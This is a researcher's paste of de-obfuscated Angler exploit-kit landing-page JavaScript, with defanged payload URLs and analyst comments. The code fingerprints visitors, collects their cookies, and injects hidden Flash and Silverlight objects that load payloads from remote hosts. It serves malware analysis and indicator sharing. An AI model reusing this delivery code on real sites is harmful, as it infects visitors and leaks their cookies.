Neonprimetime

Angler EK De-obfuscated neuropathysupport.org

Apr 18th, 2016
  1. Angler EK De-obfuscated
  2. ******
  3. Silverlight & Flash payloads
  4. *******
  5. Payloads
  6. ******
  7. hxxp://aergernisseravintolaansa.neuropathysupport.org/?r=&h=APBh302sN&n=&s=GX9rBCN&f=&g=NGGxo1&u=3rrRlwL_yk&p=XorhGc3a3&j=&b=Gox3uRJ    
  8. hxxp://aergernisseravintolaansa.neuropathysupport.org/?t=D9E-&r=J34&e=CErpXFFb&u=cA0_ABU&q=&w=TtuCk&x=Osk2jQ&j=B-b0pm&s=&g=uFjZJJm7K
  9. hxxp://aergernisseravintolaansa.neuropathysupport.org/?l=&i=Lm2y&q=es3NcAUV&v=pcqsF4goj&t=&k=Q-iA-FNZ8B&g=GDpEdRWQo&a=V2JKx-4rfd809a24395b2a6cb60110fb35a8ec6eebb15798
  10. hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=B-oC&d=UntZ9Bi&n=&x=nHxAGjttNaYVxBViYlO5Wq3xBaWaRMib5ojB_
  11. hxxp://aergernisseravintolaansa.neuropathysupport.org/?y=U1EJRx-u&a=SynGIivs&g=&p=nUgqt&f=QjZMCxzw56keluQ174xhVpSASs0ee9cb60e9fa31459eb417f555ed94afa92937f3d
  12. ******
  13.  File1
  14. ******
  // Analyst note: returns the Base64 (window.btoa) encoding of window['cooc'].
  // File3 on this page builds window['cooc'] as a request-header-style string
  // from the visitor's user agent, referrer, language and cookies.
  15.   function Jeh1jEjepq() {
  16.       return window.btoa(window['cooc']);
  17.   };
  18.  
  // Analyst note: decodes ivKvzfcr_ivKvzfcr with JWQC (the decoder registered in
  // File3). The encoded value is not shown on this page; the result is used below
  // as the host part of the Silverlight "source" URL.
  19.   function getKolaio() {
  20.       return JWQC(ivKvzfcr_ivKvzfcr);
  21.   }
  22.  
  // Analyst note: decodes ivKvzfcs_ivKvzfcs with JWQC. The encoded value is not
  // shown on this page; the result is used below as the path part of the
  // Silverlight "source" URL.
  23.   function getTxl() {
  24.       return JWQC(ivKvzfcs_ivKvzfcs);
  25.   }
  26.  
  // Analyst note: decodes ivKvzfcw_ivKvzfcw with JWQC. The result is handed to the
  // Silverlight object as the gvTrvze entry of initParams; what the payload does
  // with it is not visible here.
  27.   function gIu() {
  28.       return JWQC(ivKvzfcw_ivKvzfcw);
  29.   }
  // Analyst note: builds the markup for a Silverlight plug-in object and writes it
  // into the page. autoUpgrade is "false" and minRuntimeVersion is 4.0.50524.0.
  // The "source" URL is assembled from the two JWQC-decoded values (host, path);
  // the decoder inputs are not shown on this page, so the URL itself cannot be
  // read from this listing. initParams carries gIu() as gvTrvze and the
  // Base64-encoded header string as KetErve.
  30.   var tSp = '<form id="form1" runat="server" style="height: 100%">' +
  31. '<div id="silverlightControlHost">' +
  32. '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">' +
  33. '<param name="minRuntimeVersion" value="4.0.50524.0" />' +
  34. '<param name="autoUpgrade" value="false" />' +
  35. '<param name="source" value="http://' + getKolaio() + '/' + getTxl() + '" />' +
  36. '<param name="initParams" value="gvTrvze=' + gIu() + ',KetErve=' + Jeh1jEjepq() + '"/>' +
  37. '</object>' +
  38. '</div>' +
  39. '</form>';
  // The markup is injected via innerHTML into the fourth <q> element (index 3) of
  // the landing page; the <q> elements appear to serve as placeholders (File2
  // replaces index 2).
  40.   document.getElementsByTagName("q")[3].innerHTML = tSp;
  41.  
  42. ******
  43.  File2
  44. ******
  // Analyst note: Flash loader. The whole body only runs when window.T8eJEEf1 is
  // truthy; File3 on this page sets that flag. It builds a 1x1 Flash <object>
  // whose movie URL and FlashVars come from JWQC-decoded page variables, then
  // swaps it in for the third <q> element of the landing page.
  45. if (window.T8eJEEf1) {
          // Method names are held as strings and called as obj[s](...) / obj[a](...);
          // presumably to keep the literal calls out of static signatures.
  46.     var a = 'appendChild',
  47.         d = document,
  48.         w = window;
  49.  
          // Base64 of the header-style fingerprint string built in File3.
  50.     function getH() {
  51.         return w.btoa(w['cooc']);
  52.     };
  53.  
          // Decoded value used as the host of the movie URL (see furl).
  54.     function getKolaio() {
  55.         return JWQC(ivKvzfck_ivKvzfck);
  56.     }
  57.  
          // Decoded value used as the path of the movie URL; the argument is ignored.
  58.     function getTxl(a) {
  59.         return JWQC(ivKvzfcg_ivKvzfcg);
  60.     }
  61.  
          // Decoded value sent as the "u" FlashVars field.
  62.     function getD() {
  63.         return JWQC(ivKvzfct_ivKvzfct);
  64.     }
  65.  
          // Decoded value sent as the "exec" FlashVars field; the argument is ignored.
  66.     function getData(a) {
  67.         return JWQC(ivKvzfcp_ivKvzfcp);
  68.     }
  69.  
          // Returns ivKvzfco_ivKvzfco as-is (not passed through JWQC); sent as "g".
  70.     function getG() {
  71.         return ivKvzfco_ivKvzfco;
  72.     }
  73.  
          // Not called anywhere in this listing. The else branch is a bare string
          // expression with no return, so the function yields undefined when
          // w.dek1o is falsy. w.dek1o is not set on this page.
  74.     function getDx() {
  75.         if (!!w.dek1o) {
  76.             return getD()
  77.         } else {
  78.             "ew"
  79.         };
  80.     }
  81.     var s = 'setAttribute',
  82.         mirtul = "1",
  83.         ci = "clsid:",
              // Feature-detection ladder that maps the browser to an IE version
              // number: 11 when MSInputMethodContext exists, 99 when document.all
              // is absent (non-IE), otherwise 10 down to 1. isMSIE is true only
              // for results below 11, i.e. IE 10 and older.
  84.         isMSIE = (function() {
  85.             return (!!w.MSInputMethodContext ? 11 : !d.all ? 99 : w.atob ? 10 : d.addEventListener ? 9 : d.querySelector ? 8 : w.XMLHttpRequest ? 7 : d.compatMode ? 6 : w.attachEvent ? 5 : 1) < 11;
  86.         })(),
              // furl: movie URL. fvar: FlashVars query string carrying the decoded
              // values plus the Base64 fingerprint in the "h" field.
  87.         furl = 'http://' + getKolaio() + '/' + getTxl(mirtul),
  88.         fvar = 'exec=' + getData(mirtul) + '&h=' + getH() + '&g=' + getG() + '&u=' + getD() + '';
  89.  
          // Creates a <param name=pN value=pV> element.
  90.     function cParam(pN, pV) {
  91.         var p = d.createElement("param");
  92.         p[s]("name", pN);
  93.         p[s]("value", pV);
  94.         return p;
  95.     }
  96.  
          // Old-IE path: builds the <object> from an HTML string with the Flash
          // ActiveX classid (D27CDB6E-AE6D-11cf-96B8-444553540000), 1x1 pixels,
          // allowScriptAccess='always', and returns the parsed element.
  97.     function cObject(url, fv) {
  98.         var div = d.createElement("div");
  99.         div.innerHTML = "<object id='23kjsdf' classid='" + ci + "D27CDB6E-AE6D-11cf-96B8-444553540000' width=1 height=1 allowScriptAccess='always'>" + "<param name='movie' value='" + url + "'>" + "<param name='play' value='true'>" + "<param name='FlashVars' value='" + fv + "'>" + "</object>";
  100.         return div.firstChild;
  101.     }
          // Old IE gets the string-built object; every other browser gets an empty
          // <object> that is configured through attributes and <param> children.
  102.     var obj = (isMSIE) ? cObject(furl, fvar) : document.createElement("object"),
  103.         p1 = cParam('movie', 'http://' + getKolaio() + '/' + getTxl(mirtul)),
  104.         p2 = cParam('play', 'true'),
  105.         p3 = cParam('FlashVars', fvar);
          // The fixed element id "23kjsdf" and the 1x1 size are static strings in
          // this sample and can serve as content indicators.
  106.     obj[s]("id", "23kjsdf");
  107.     obj[s]("width", "1");
  108.     obj[s]("height", "1");
  109.     if (!isMSIE) {
  110.         obj[s]("type", "application/x-shockwave-flash");
  111.         obj[s]("data", furl);
  112.         obj[a](p1);
  113.         obj[a](p2);
  114.         obj[a](p3);
  115.     }
          // w.s2e is not set on this page. When it is truthy obj becomes 0, so the
          // replaceChild call below receives a non-node value; presumably a switch
          // that disables the Flash stage.
  116.     if (w.s2e) {
  117.         obj = 0
  118.     }
          // Empty try/catch; presumably a remnant of the original obfuscated script.
  119.     try {;
  120.     } catch (e) {}
          // The third <q> element (index 2) is the placeholder that is replaced.
  121.     var target_element = d.getElementsByTagName("q")[2];
  122.     target_element.parentNode.replaceChild(obj, target_element);
  123. }
  124. ******
  125.  File3
  126. ******
  // Analyst note: global flags. File2 on this page runs its body only when
  // window.T8eJEEf1 is truthy; T8eJEEf2 is not read anywhere in this listing.
  127. window.T8eJEEf1 = true;
  128. window.T8eJEEf2 = true;
  // Analyst note: compatibility shim. Installs Array.prototype.indexOf only when
  // the browser lacks it (strict-equality linear search from `start`, -1 when not
  // found). The JWQC decoder body below calls indexOf on an array, so this keeps
  // the decoder working on browsers without a native implementation.
  129. if (!Array.prototype.indexOf) {
  130.     Array.prototype.indexOf = function(obj, start) {
  131.         for (var i = (start || 0), j = this.length; i < j; i++) {
  132.             if (this[i] === obj) {
  133.                 return i;
  134.             }
  135.         }
  136.         return -1;
  137.     };
  138. }
  // Analyst note: compatibility shim. Defines window.btoa only when the browser
  // has none, backed by a small Base64 object. File1 and File2 use window.btoa to
  // encode the window['cooc'] string.
  139. if (!window.btoa) {
  140.     var Base64 = {
               // Standard Base64 alphabet; index 64 ('=') is the padding character.
  141.         _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
               // UTF-8 encodes the input, then emits four alphabet characters per
               // three input bytes, padding with '=' when a byte is missing
               // (charCodeAt past the end yields NaN).
  142.         encode: function(b) {
  143.             var q, l, p, f, k, g, d, m = "",
  144.                 j = 0;
  145.             for (b = Base64._utf8_encode(b); j < b.length;) {
  146.                 q = b.charCodeAt(j++), l = b.charCodeAt(j++), p = b.charCodeAt(j++), f = q >> 2, k = (3 & q) << 4 | l >> 4, g = (15 & l) << 2 | p >> 6, d = 63 & p, isNaN(l) ? g = d = 64 : isNaN(p) && (d = 64), m = m + this._keyStr.charAt(f) + this._keyStr.charAt(k) + this._keyStr.charAt(g) + this._keyStr.charAt(d);
  147.             }
  148.             return m;
  149.         },
               // Normalises CRLF to LF, then converts each UTF-16 code unit to a
               // one-, two- or three-byte UTF-8 sequence.
  150.         _utf8_encode: function(d) {
  151.             d = d.replace(/\r\n/g, "\n");
  152.             for (var c = "", f = 0; f < d.length; f++) {
  153.                 var b = d.charCodeAt(f);
  154.                 128 > b ? c += String.fromCharCode(b) : b > 127 && 2048 > b ? (c += String.fromCharCode(b >> 6 | 192), c += String.fromCharCode(63 & b | 128)) : (c += String.fromCharCode(b >> 12 | 224), c += String.fromCharCode(b >> 6 & 63 | 128), c += String.fromCharCode(63 & b | 128));
  155.             }
  156.             return c;
  157.         }
  158.     };
  159.     window.btoa = function(str) {
  160.         return Base64.encode(str);
  161.     }
  162. }
  // Analyst note: client fingerprint. Builds a string laid out like HTTP request
  // headers (Accept, User-Agent, optional Referer, Accept-Language defaulting to
  // "en-US", Accept-Encoding, optional Cookie) from navigator and document
  // properties and stores it in window['cooc']. File1 and File2 Base64-encode it
  // and pass it to the Silverlight (KetErve) and Flash (h) objects; how the
  // payloads use it is not visible on this page. Note that document.cookie for
  // the landing-page origin is included when present.
  163. window['cooc'] = (function() {
  164.     var ln1 = (navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage));
  165.     var t = 'Accept: *\/*\r\n' + 'User-Agent: ' + navigator.userAgent + '\r\n' + (document.referrer ? 'Referer: ' + document.referrer + '\r\n' : "") + 'Accept-Language: ' + (!!ln1 ? ln1 : "en-US") + '\r\n' + 'Accept-Encoding: gzip, deflate' + (!!document.cookie ? '\r\nCookie: ' + document.cookie : '');
  166.     return t;
  167. })();
  // Analyst note: string decoder used by every getXxx() helper in File1 and File2.
  // The function is compiled at run time with `new Function`, and the method
  // names 'push' and 'indexOf' are spliced into its source text from the
  // variables p and i, presumably so the literal calls do not appear in the page.
  // What the generated body does:
  //   - takes the key from ivKvzfcu_ivKvzfcu (not shown on this page) and derives
  //     a column order: for each character of the sorted key, its index in the
  //     unsorted key;
  //   - replaces every '+' in the input with '%' and pads the input with spaces
  //     to a multiple of the key length;
  //   - reads the input in key-length chunks and reorders each chunk's characters
  //     by that column order (a columnar transposition);
  //   - strips all whitespace from the result and returns it.
  // The delete(...) calls target local variables and have no effect on them.
  // For analysis, the decoder can be reproduced offline once the key and the
  // encoded ivKvzfc* values are captured from the landing page.
  168. var p = 'push',
  169.     i = 'indexOf';
  170. window["JWQC"] = new Function('vtx', "var cryptKey = ivKvzfcu_ivKvzfcu, rA = cryptKey.split(''), sA = cryptKey.split(''), keyArray=[];sA.sort(); var keySize = sA.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rA." + i + "(sA[i]));}vtx = vtx.replace(/\\+/g,'%');var k = keySize - vtx.length % keySize;for(var l = 0; l<k;l++) {vtx += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < vtx.length; i += keySize) {line = vtx.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}delete(rA);delete(sA);delete(keyArray);delete(newLine);delete(line);endStr=endStr.replace(/\\s/g,'');return endStr;");
  171.  
  172.  
  173.  
  174. *******
  175. *******
  176. *******
  177. More FROM @neonprimetime security
  178.  
  179. http://pastebin.com/u/Neonprimetime
  180. https://www.virustotal.com/en/USER/neonprimetime/
  181. https://twitter.com/neonprimetime
  182. https://www.reddit.com/USER/neonprimetime